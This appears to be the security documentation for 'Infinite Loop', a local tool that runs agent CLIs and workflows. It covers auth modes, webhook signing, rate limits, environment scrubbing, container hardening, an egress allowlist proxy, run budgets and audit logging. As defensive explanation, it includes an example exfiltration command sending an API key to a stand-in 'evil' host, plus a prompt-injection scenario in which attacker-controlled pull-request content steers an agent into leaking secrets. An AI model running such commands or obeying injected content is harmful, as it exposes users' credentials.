Infinite Loop is a developer tool that runs on your machine and can execute:
- Local agent CLIs (claude, codex, anything you register as a provider).
- Inline TypeScript and Python (Script nodes).
- Shell commands (Condition nodes with kind: command).
- Workflows queued by inbound webhooks.
That power means it should be treated like a local code execution surface, not a typical web app.
Out of the box server.ts binds to 127.0.0.1 (loopback), so the console is reachable only from this machine. This is the fail-closed default: no token is needed because nothing off-host can connect.
To reach the console from other machines you must bind a network address (HOST=0.0.0.0 or a specific LAN IP). Because anyone who can reach the port can also run your workflows — including the shell-condition and script nodes — the server will refuse to start when bound to a network address with no INFLOOP_API_TOKEN. You then have two choices:
- Recommended: require a token (see Authenticated mode below):
  INFLOOP_API_TOKEN=$(openssl rand -hex 32) HOST=0.0.0.0 bun run start
- Acknowledge the risk and run unauthenticated on a trusted network:
  INFLOOP_ALLOW_INSECURE=1 HOST=0.0.0.0 bun run start
  This starts the server but prints a loud insecure-mode banner. Anyone on the network can execute arbitrary code on this machine, so only do this on a network you fully trust.
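The startup rule described above can be sketched as a small decision function. This is an illustration only, not the actual server.ts logic: the names decideStartup and isLoopback, the result shape, and the set of hosts treated as loopback are all assumptions. Only HOST, INFLOOP_API_TOKEN, and INFLOOP_ALLOW_INSECURE come from this document.

```typescript
// Hypothetical sketch of the fail-closed bind check; not the real server.ts code.
type StartupDecision =
  | { ok: true; mode: "loopback" | "authenticated" | "insecure" }
  | { ok: false; reason: string };

// Assumption: only these literal hosts count as loopback.
function isLoopback(host: string): boolean {
  return host === "127.0.0.1" || host === "::1" || host === "localhost";
}

function decideStartup(env: Record<string, string | undefined>): StartupDecision {
  const host = env.HOST ?? "127.0.0.1"; // loopback is the default bind
  // A token always enables authenticated mode, on any bind address.
  if (env.INFLOOP_API_TOKEN) return { ok: true, mode: "authenticated" };
  // No token: fine on loopback, because nothing off-host can connect.
  if (isLoopback(host)) return { ok: true, mode: "loopback" };
  // No token on a network address: only with the explicit opt-in.
  if (env.INFLOOP_ALLOW_INSECURE === "1") return { ok: true, mode: "insecure" };
  return { ok: false, reason: `refusing to bind ${host} without INFLOOP_API_TOKEN` };
}
```

The ordering is the point of the sketch: the unauthenticated network case is reachable only through the explicit opt-in, and every other tokenless network bind falls through to a refusal.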
Set INFLOOP_API_TOKEN to require authentication on every /api/* call
(webhook ingress is the one exception — see below):
INFLOOP_API_TOKEN=$(openssl rand -hex 32) bun run start
In this mode:
- The browser UI keeps working. Visiting the console redirects to a login page; enter the token once and the server sets an httpOnly, SameSite=Strict session cookie, after which the console behaves normally.
- MCP / API / scripted clients keep authenticating with Authorization: Bearer <token>, unchanged.
- The session cookie value is a SHA-256 hash of the token, not the token itself: a leaked cookie cannot be replayed as the bearer token and never exposes the literal INFLOOP_API_TOKEN. It is still a credential for this server, though: a stolen cookie grants full access until the token is rotated, so treat it like a password.
- The session is stateless (no server-side store): it survives a server restart, and rotating INFLOOP_API_TOKEN invalidates every issued cookie immediately.
- The cookie is marked Secure automatically when a reverse proxy reports HTTPS via X-Forwarded-Proto; over plain HTTP it is not, because a Secure cookie would never be stored.
- The token is compared in constant time but is otherwise a plain shared secret, so rotate it like a password.
This is a single-tenant model: one shared token, no per-user accounts.
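The stateless session described above can be illustrated with Node's crypto module. The document states only that the cookie value is a SHA-256 hash of the token; the hex encoding, the absence of any salt or prefix, and the function names sessionValueFor and isValidSession are assumptions made for this sketch.

```typescript
import { Buffer } from "node:buffer";
import { createHash, timingSafeEqual } from "node:crypto";

// Assumption: the cookie value is the hex SHA-256 digest of the token.
function sessionValueFor(token: string): string {
  return createHash("sha256").update(token, "utf8").digest("hex");
}

// Stateless check: recompute the expected value from the current token
// and compare in constant time. Nothing is stored server-side.
function isValidSession(cookieValue: string, currentToken: string): boolean {
  const expected = Buffer.from(sessionValueFor(currentToken), "utf8");
  const presented = Buffer.from(cookieValue, "utf8");
  // timingSafeEqual throws on unequal lengths, so reject those first.
  if (presented.length !== expected.length) return false;
  return timingSafeEqual(presented, expected);
}
```

Because the expected value is recomputed from the current token on every request, a restart changes nothing, while rotating the token makes every previously issued cookie fail the comparison.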
The unguessable triggerId in a webhook URL is the base credential.
- Treat webhook URLs like passwords. Don't paste them in shared docs or screenshots.
- Rotate via the regenerate-id button in the Dispatch form.
INFLOOP_API_TOKEN does not apply to webhook ingress: external services like GitHub can't carry custom auth headers.
When a webhook plugin declares a signing scheme (e.g. GitHub's HMAC-SHA256), a trigger built on it is signature-verified: Infinite Loop recomputes the HMAC over the raw request body with the trigger's shared secret and rejects a missing or mismatched signature with 401. Set the secret in the Dispatch form when you create the trigger. A trigger on a signing-capable plugin must either carry a secret or explicitly opt out with verifyOptional: true (accepts unsigned requests, logs a warning) — with neither set, the request is refused as misconfigured rather than silently trusted.
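A minimal sketch of that verification flow, assuming a GitHub-style signature header of the form sha256=<hex digest>. The TriggerAuth shape, the Verdict names, and the function verifyWebhook are hypothetical; only secret, verifyOptional, and the 401 response come from the text. How a trigger with both a secret and verifyOptional set is handled is not specified here, so the sketch simply verifies whenever a secret is present.

```typescript
import { Buffer } from "node:buffer";
import { createHmac, timingSafeEqual } from "node:crypto";

type Verdict = "accepted" | "rejected-401" | "misconfigured";

// Hypothetical trigger shape; only `secret` and `verifyOptional` come from the text.
interface TriggerAuth {
  secret?: string;
  verifyOptional?: boolean;
}

function verifyWebhook(trigger: TriggerAuth, rawBody: Buffer, signatureHeader?: string): Verdict {
  if (!trigger.secret) {
    // No secret: accepted only with the explicit opt-out, otherwise refused.
    return trigger.verifyOptional ? "accepted" : "misconfigured";
  }
  if (!signatureHeader) return "rejected-401";
  // Recompute the HMAC over the raw bytes, never over re-serialized JSON.
  const expected =
    "sha256=" + createHmac("sha256", trigger.secret).update(rawBody).digest("hex");
  const presented = Buffer.from(signatureHeader, "utf8");
  const wanted = Buffer.from(expected, "utf8");
  const match = presented.length === wanted.length && timingSafeEqual(presented, wanted);
  return match ? "accepted" : "rejected-401";
}
```

Hashing the raw body matters because any re-encoding of the payload (key order, whitespace) changes the bytes and therefore the digest.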
INFLOOP_API_TOKEN does not gate the two surfaces that most need it: webhook
ingress (external senders cannot carry a bearer header) and the browser login
form (it is what issues the credential). Both are rate-limited in-process as
a defense-in-depth control:
- Webhook ingress is limited per trigger (INFLOOP_WEBHOOK_RATE_LIMIT, default 120/min), so a leaked trigger URL cannot be hammered without limit. The bucket is keyed on the triggerId alone, so a flood also throttles that trigger's legitimate traffic; the real remedy for a leaked URL is to rotate it.
- Browser login is limited by a single global bucket (INFLOOP_LOGIN_RATE_LIMIT, default 20/min). Brute-forcing a 256-bit token is already infeasible; this caps the log, audit, and CPU churn a login flood can cause. A sustained flood can 429 the login form, but the operator can still authenticate API/MCP calls with Authorization: Bearer, which is not behind this limiter.
Over the limit the response is 429 with a Retry-After header. The limiter
is in-memory and per-process: it resets on restart and a port-fallback second
instance keeps its own. It is a backstop, not a substitute for the proxy
below.
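To make the behaviour concrete, here is a small in-memory limiter keyed by an arbitrary string (a triggerId, or a single constant key for the global login bucket). The document does not say which algorithm the real limiter uses; this sketch uses a fixed one-minute window as a stand-in, and createLimiter and its result shape are hypothetical names.

```typescript
interface LimitResult {
  allowed: boolean;
  retryAfterSeconds: number; // value for a Retry-After header when denied
}

// Fixed-window counter, held in process memory only (so it resets on restart).
function createLimiter(limit: number, windowMs: number = 60_000) {
  const windows = new Map<string, { start: number; count: number }>();

  return function check(key: string, now: number = Date.now()): LimitResult {
    const current = windows.get(key);
    if (!current || now - current.start >= windowMs) {
      // First request for this key, or the previous window has expired.
      windows.set(key, { start: now, count: 1 });
      return { allowed: true, retryAfterSeconds: 0 };
    }
    if (current.count < limit) {
      current.count += 1;
      return { allowed: true, retryAfterSeconds: 0 };
    }
    // Over the limit: report how long until the window rolls over.
    const remainingMs = current.start + windowMs - now;
    return { allowed: false, retryAfterSeconds: Math.ceil(remainingMs / 1000) };
  };
}
```

Since the key is the only thing that separates buckets, a flood against one key also exhausts the allowance for legitimate callers sharing that key, which is the trade-off noted for the per-trigger bucket.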
Infinite Loop has no per-user auth — one shared token, no accounts. Webhook ingress and browser login are rate-limited (see above) and trust-relevant events are recorded in an audit log, but for a publicly reachable trigger surface you should still put Infinite Loop behind one of:
- A Cloudflare Tunnel with Access policies that gate inbound traffic.
- A Tailscale ACL-restricted host.
- A reverse proxy (Caddy / nginx) with HTTP auth and IP allow-lists.
Never punch a port mapping on your router straight to Infinite Loop.
A .workflow.json file can:
- Run arbitrary shell commands via a Condition.
- Execute arbitrary TypeScript or Python via a Script node.
- Invoke any provider you have registered.
Review every workflow you import or download before running it. Treat them like you'd treat a Bash script from the internet.
The same applies to providers/*.json, webhook-plugins/*.json, and triggers/*.json — they all influence what Infinite Loop will execute or accept.
Agent and Script nodes run untrusted code — AI-authored, and routinely
shaped by webhook payloads the server does not control (a GitHub
pull_request trigger feeds an attacker-supplied title, body, and diff
straight into an agent prompt). The settings below bound what that code can
reach. They limit blast radius; the network posture and INFLOOP_API_TOKEN
limit who can ask. Both matter.
Spawned children do not inherit the server's environment. Each is given an explicit allowlist:
- a small base set of non-secret, environment-shaping variables (PATH, HOME, locale, TZ, TLS/proxy config, …);
- the variables a provider manifest declares it needs in envPassthrough (the claude manifest passes ANTHROPIC_* and CLAUDE_*, for example);
- anything the operator opts into via INFLOOP_CHILD_ENV_PASSTHROUGH (comma-separated exact names or PREFIX_* wildcards), the escape hatch for site-specific needs such as a Bedrock AWS_*, an SSH_AUTH_SOCK, or a Python virtualenv.
The entire INFLOOP_ namespace is never passed to a child — most
importantly INFLOOP_API_TOKEN, the bearer token gating the whole API. A
prompt-injected agent can no longer echo $INFLOOP_API_TOKEN and exfiltrate
it.
This is a behavior change: a Script that relied on an inherited host variable
(a venv, a registry token) must now have it named in
INFLOOP_CHILD_ENV_PASSTHROUGH. A provider's child needs its credentials
named in the manifest envPassthrough.
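The allowlist composition can be sketched as follows. The BASE_VARS list is a shortened, illustrative stand-in for the real base set, and buildChildEnv and matchesPattern are hypothetical names; the pattern syntax (exact names or PREFIX_* wildcards) and the unconditional exclusion of the INFLOOP_ namespace follow the description above.

```typescript
type Env = Record<string, string | undefined>;

// Assumption: an illustrative subset of the base variables.
const BASE_VARS = ["PATH", "HOME", "LANG", "TZ"];

// A pattern is either an exact name or a PREFIX_* wildcard.
function matchesPattern(name: string, pattern: string): boolean {
  return pattern.endsWith("*")
    ? name.startsWith(pattern.slice(0, -1))
    : name === pattern;
}

function buildChildEnv(serverEnv: Env, manifestPassthrough: string[]): Record<string, string> {
  const operatorPatterns = (serverEnv.INFLOOP_CHILD_ENV_PASSTHROUGH ?? "")
    .split(",")
    .map((entry) => entry.trim())
    .filter((entry) => entry.length > 0);
  const patterns = [...BASE_VARS, ...manifestPassthrough, ...operatorPatterns];

  const child: Record<string, string> = {};
  for (const [name, value] of Object.entries(serverEnv)) {
    if (value === undefined) continue;
    // The INFLOOP_ namespace is dropped even if a pattern would match it.
    if (name.startsWith("INFLOOP_")) continue;
    if (patterns.some((pattern) => matchesPattern(name, pattern))) child[name] = value;
  }
  return child;
}
```

Starting from an empty object and copying in only what matches is what makes this an allowlist: a variable nobody named is absent from the child rather than filtered out after the fact.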
The claude provider is no longer shipped with
--dangerously-skip-permissions baked into its manifest. By default an
agent runs the CLI with its normal permission posture; in non-interactive
mode that means it cannot perform tool calls that require approval (it logs a
[permissions] notice when this applies).
To grant full autonomous file / shell / network access, tick "Skip
permission prompts (dangerous)" on the Agent node — it maps to the
manifest's dangerousArgs, injected only for that node. Enable it only for
prompts you trust, and ideally only inside the sandboxed container below.
Existing saved workflows are affected: a Claude agent node that previously ran fully autonomous now runs with prompts enabled until you opt back in. This is deliberate — autonomy is now a visible choice, not a silent default.
docker-compose.yml runs the app with a read-only root filesystem, all
Linux capabilities dropped, no-new-privileges, a pids_limit, and
writable state confined to named volumes and a /tmp tmpfs. Treat the
container as the containment unit for the untrusted code a run executes, and
do not bind-mount host directories into it by default.
The container needs egress (provider APIs, webhook responses), so it cannot
run --network none. To bound an individual agent run's network, see the
per-run egress allowlist below.
An Agent node spawns a provider CLI that runs untrusted, prompt-shaped code
with a real API credential in its environment — the manifest's envPassthrough
(ANTHROPIC_*, OPENAI_*), which scrubbing cannot strip without breaking the
provider. The risk is exfiltration: a prompt-injected agent running
curl https://evil/ -d "$ANTHROPIC_API_KEY".
A CLI provider manifest can declare an egressAllowlist — the hostnames
its child legitimately needs, each an exact host or a leading-wildcard
(*.anthropic.com, matching any subdomain but not the apex). When the
operator sets INFLOOP_EGRESS_ENFORCE=1, the runner starts a per-run
filtering proxy bound to loopback, points the child's HTTP(S)_PROXY at it,
and the proxy permits CONNECT tunnels and plain-HTTP forwards only to
allowlisted hosts — everything else is refused with 403 and logged. The
proxy also resolves each host itself and refuses one that resolves to a
loopback, private, or link-local address (a DNS-rebinding / SSRF guard, so it
cannot be turned into a pivot to an internal service or a cloud metadata
endpoint) unless that exact IP is itself an allowlist entry. If the proxy
cannot start, the run fails closed rather than running unrestricted. The
shipped claude and codex manifests already declare allowlists for their
provider APIs.
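The hostname-matching rule (exact host, or a leading wildcard that matches subdomains but not the apex) can be sketched like this. The function name hostAllowed and the case-insensitive comparison are assumptions, and the sketch covers only name matching, not the proxy's own DNS resolution and private-address check.

```typescript
// Returns true when `host` is permitted by an exact or leading-wildcard entry.
function hostAllowed(host: string, allowlist: string[]): boolean {
  const candidate = host.toLowerCase();
  return allowlist.some((entry) => {
    const pattern = entry.toLowerCase();
    if (pattern.startsWith("*.")) {
      // "*.example.com" keeps the leading dot in the suffix, so the apex
      // "example.com" and lookalikes such as "evilexample.com" do not match.
      const suffix = pattern.slice(1);
      return candidate.endsWith(suffix) && candidate.length > suffix.length;
    }
    return candidate === pattern;
  });
}
```

For example, with an allowlist of ["*.anthropic.com"], api.anthropic.com is permitted while anthropic.com is not; the apex needs its own exact entry.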
This is opt-in and off by default: with INFLOOP_EGRESS_ENFORCE unset,
children spawn exactly as before. The exact endpoint set a CLI needs varies by
version, so enable enforcement deliberately and extend the allowlist for your
setup.
What it is and isn't — it catches every standard HTTP client that honours
HTTP(S)_PROXY (curl, wget, the provider CLIs, Python requests). It is
defense-in-depth, not a jail:
- Raw-socket code that ignores proxy env vars bypasses it.
- It does not stop exfiltration to an allowlisted host: an attacker can encode the key into a request to api.anthropic.com itself. It removes the arbitrary-endpoint channel and forces an attacker onto hosts you chose.
- It assumes direct outbound; chaining to a mandatory upstream corporate proxy is not supported.
For a stronger boundary, also run Infinite Loop on a network it cannot abuse.
New Agent nodes default to "Run in isolated git worktree", so an agent
edits a fresh worktree off cwd rather than the working tree directly. This
is a correctness/isolation default, not a security boundary — the process
still shares the host's filesystem and network. Uncheck it for a cwd that
is not a git repository.
A workflow that loops without a real bound — an infinite: true Loop, or
nested loops that multiply — can keep invoking agents (and spending API
credits) until a human notices. Every run is therefore capped by a
run-level budget, independent of any per-loop maxIterations:
- INFLOOP_MAX_RUN_NODE_EXECUTIONS (default 10000): the maximum number of node-execution steps in a single run. When exceeded, the run is aborted and settles as failed with a budget message. 0 disables the ceiling.
- INFLOOP_MAX_RUN_DURATION_MS (default 86400000, 24h): a wall-clock cap, checked at each node-step boundary. A run that exceeds it is stopped at its next step; a single long-running node is not interrupted mid-flight. The default is a generous backstop against a genuinely stuck run, not a tight SLA, since long autonomous runs are expected. A run that legitimately needs more than 24h must raise this or set it to 0 (disabled).
- INFLOOP_MAX_RUN_COST_USD (default 0, disabled): a cumulative cost ceiling in US dollars. When set, the run is aborted and settles as failed once the total cost reported by its agents exceeds the cap. It is opt-in because no single dollar figure is safe for every user; set it to your real per-run budget.
A per-run cost cap does not bound a webhook storm or a misconfigured trigger — each run can stay under its own cap while the fleet of them spends without limit. The process-wide cost budget closes that:
- INFLOOP_MAX_TOTAL_COST_USD (default 0, disabled): a cumulative cost ceiling, in US dollars, across every run since the process started. Once cumulative provider-reported cost passes it, new runs are refused at admission (POST /api/run answers 503) and any in-flight run is aborted at its next costed node. Queued trigger runs are held, not dropped: the queue drain pauses, leaving them on disk to resume after a restart (which also resets the in-memory total). A queued run was already acknowledged to its caller, so it is not silently discarded. Like the per-run cap it is opt-in; set it to your real budget. It is process-lifetime and in-memory: a restart resets the total to zero. For a windowed (e.g. daily) view, alert on the infloop_run_cost_usd_total metric instead; see configuration.md.
The node and wall-clock ceilings bound every run. The node ceiling is the
deterministic guard: an unbounded loop will always hit it. Raise the limit if
you have a legitimately large workflow — but treat a budget failure as a
prompt to add an explicit maxIterations cap, not just to raise the ceiling.
Cost-cap coverage. Both cost caps only count cost from providers that
report it — currently the claude CLI (via its total_cost_usd result
frame). HTTP providers report no cost, so a workflow built entirely on HTTP
providers is not bounded by either cost cap; the node and wall-clock
ceilings remain its backstop. The cost is also surfaced per agent node as the
costUsd output (usable in {{ ... }} templates).
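The per-run ceilings can be pictured as a single check evaluated at each node-step boundary. This is a sketch under assumptions: the RunBudget and RunProgress shapes and the budgetViolation function are hypothetical, and the choice of a strict "greater than" comparison is an interpretation of "exceeded". The 0-means-disabled convention follows the settings described above.

```typescript
// Limits for one run; a value of 0 disables that ceiling.
interface RunBudget {
  maxNodeExecutions: number;
  maxDurationMs: number;
  maxCostUsd: number;
}

interface RunProgress {
  nodeExecutions: number; // steps executed so far
  startedAtMs: number;    // wall-clock start of the run
  costUsd: number;        // sum of provider-reported cost; 0 if none reports it
}

// Returns a failure message when a ceiling is exceeded, or null to continue.
function budgetViolation(budget: RunBudget, progress: RunProgress, nowMs: number): string | null {
  if (budget.maxNodeExecutions > 0 && progress.nodeExecutions > budget.maxNodeExecutions) {
    return "run budget exceeded: node executions";
  }
  if (budget.maxDurationMs > 0 && nowMs - progress.startedAtMs > budget.maxDurationMs) {
    return "run budget exceeded: wall-clock duration";
  }
  if (budget.maxCostUsd > 0 && progress.costUsd > budget.maxCostUsd) {
    return "run budget exceeded: cost";
  }
  return null;
}
```

Because the check runs only between steps, a node that is already executing finishes before the duration ceiling takes effect, and a run whose providers report no cost never trips the cost branch.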
The run-level budget only bounds spend while the server process is alive.
Provider CLIs are spawned in their own process group (detached: true) so a
per-run cancel can kill grandchildren — but the flip side is they do not
die with the server. A hard crash (OOM-kill, kill -9, power loss) skips the
graceful-shutdown handlers entirely, leaving every in-flight agent CLI running
as an orphan that keeps spending API credits, invisibly.
To close that gap, every detached child is recorded under <data-dir>/pids/
and every in-flight run leaves a marker under <data-dir>/active-runs/. On the
next start, before the HTTP server accepts traffic, Infinite Loop:
- kills any orphaned process groups left behind by the previous server, and
- records any run interrupted by the crash as failed in history, so it is not silently lost.
A normal Ctrl+C shutdown reaps children directly and leaves nothing to recover. Recovery is also instance-aware: when two servers run at once (port fallback), one never reaps the other's live children or runs.
Infinite Loop runs unattended — triggered by webhooks and MCP when nobody is watching the console. A proxy in front of the app can supply per-user identity and access logs, but it can never see what the app did: which workflow ran, which trigger was created or deleted, which login attempt failed, which webhook was accepted or rejected. Only the app knows that.
So every trust-relevant event is written to a durable, append-only audit log
at <data-dir>/audit/audit.jsonl — one JSON object per line, the moment it
happens. It covers:
- run lifecycle — a run starting and settling, including runs reconciled as failed after a crash;
- auth — login successes and failures, and logout;
- triggers — every create, update, and delete via the API;
- webhooks — each request to a real trigger that is accepted or rejected (bad signature, queue full, misconfigured, invalid inputs).
Unlike run history — capped per workflow and pruned — the audit log is bounded
only by a generous size-based rotation (INFLOOP_AUDIT_MAX_BYTES /
INFLOOP_AUDIT_MAX_FILES), so it retains months of events. Entries record a
coarse actor (api-token, browser-session, webhook, system, open) but
never a secret — no tokens, no trigger secrets, no request bodies. Read it
back through the authenticated GET /api/audit endpoint.
Each entry caused by an ingress event — a webhook, an API run, an MCP enqueue
— also carries a correlationId (cid_…). The same id is stamped on the
run's events and its history record, so one grep cid_… walks the whole
chain: webhook accept → queued run → run start → run finish. The ingress
response returns the id in its body and in an x-correlation-id header.
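As an alternative to grep, the same chain can be pulled out programmatically from the JSONL text. The entry shape below is an assumption: only the correlationId field is named in this document, and entriesFor is a hypothetical helper.

```typescript
// Assumed entry shape: correlationId comes from the text, the rest is opaque.
interface AuditEntry {
  correlationId?: string;
  [field: string]: unknown;
}

// Parses JSON-lines audit text and keeps the entries for one correlation id,
// preserving file order (which is also chronological for an append-only log).
function entriesFor(jsonl: string, correlationId: string): AuditEntry[] {
  return jsonl
    .split("\n")
    .filter((line) => line.trim().length > 0)
    .map((line) => JSON.parse(line) as AuditEntry)
    .filter((entry) => entry.correlationId === correlationId);
}
```

The input would be the contents of <data-dir>/audit/audit.jsonl, or the body returned by the authenticated GET /api/audit endpoint if it serves the same line format (not confirmed here).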
The log shares the data directory's trust boundary: it is not tamper-proofed, because a local attacker who can rewrite it can already rewrite everything else on the machine.
The data directory holds two kinds of secret:
- Webhook shared secrets: the HMAC secret on a signature-verified trigger, stored in triggers/<id>.json.
- Provider connection tokens: bearer tokens for registered connections, stored in connections/<id>.json.
Both are stored in plaintext. Encryption at rest would not add a real boundary here: this host already runs arbitrary code (agent and script nodes), so anything that can read the data directory can also read the key used to decrypt it. The honest control is the data directory's own trust boundary — the same one the audit log relies on.
As defense-in-depth against other local users on a shared host — and
against accidental exposure through a world-readable backup or a misconfigured
file sync — these files are written with 0600 permissions (owner read/write
only). The atomic tmp-write-then-rename used for both stores creates the temp
file 0600, so the published file is owner-only from the moment it appears.
One residual: a trigger file written by a build older than this behavior
keeps its original permissions until it is next written — re-saving the
trigger, or any real webhook fire (which updates lastFiredAt), rewrites it
0600. Keep the data directory itself owner-only, and never commit it to a
repo or sync it to a shared location.
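The owner-only atomic write can be sketched with Node's fs module. This is an illustration of the tmp-write-then-rename pattern, not the project's actual store code: writeSecretFile, the temp-file naming, and the throwaway directory used in the usage lines are all assumptions.

```typescript
import { mkdtempSync, readFileSync, renameSync, rmSync, statSync, writeFileSync } from "node:fs";
import { tmpdir } from "node:os";
import { join } from "node:path";

// Writes `contents` to `path` so the file is owner-only from the moment it appears.
function writeSecretFile(path: string, contents: string): void {
  // Hypothetical temp name; "wx" fails if it already exists, so the file is
  // always freshly created and the requested mode is applied at creation.
  const tmp = `${path}.${process.pid}.tmp`;
  writeFileSync(tmp, contents, { mode: 0o600, flag: "wx" });
  // rename replaces the target atomically on the same filesystem and keeps
  // the temp file's permissions.
  renameSync(tmp, path);
}

// Usage: write a throwaway file, inspect its permission bits, then clean up.
const dir = mkdtempSync(join(tmpdir(), "infloop-sketch-"));
const target = join(dir, "trigger.json");
writeSecretFile(target, JSON.stringify({ secret: "example" }));
const mode = statSync(target).mode & 0o777;
const roundTrip = readFileSync(target, "utf8");
rmSync(dir, { recursive: true, force: true });
console.log(mode.toString(8)); // owner read/write only on POSIX systems
```

Setting the mode on the temp file, not on the published file afterwards, avoids a window in which the secret is readable under default permissions. Windows does not use POSIX permission bits, so the mode check is meaningful only on POSIX hosts.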
Infinite Loop is pre-1.0 and currently has no formal disclosure channel. Open a GitHub issue for non-sensitive concerns; for anything that warrants private disclosure, contact the maintainer directly.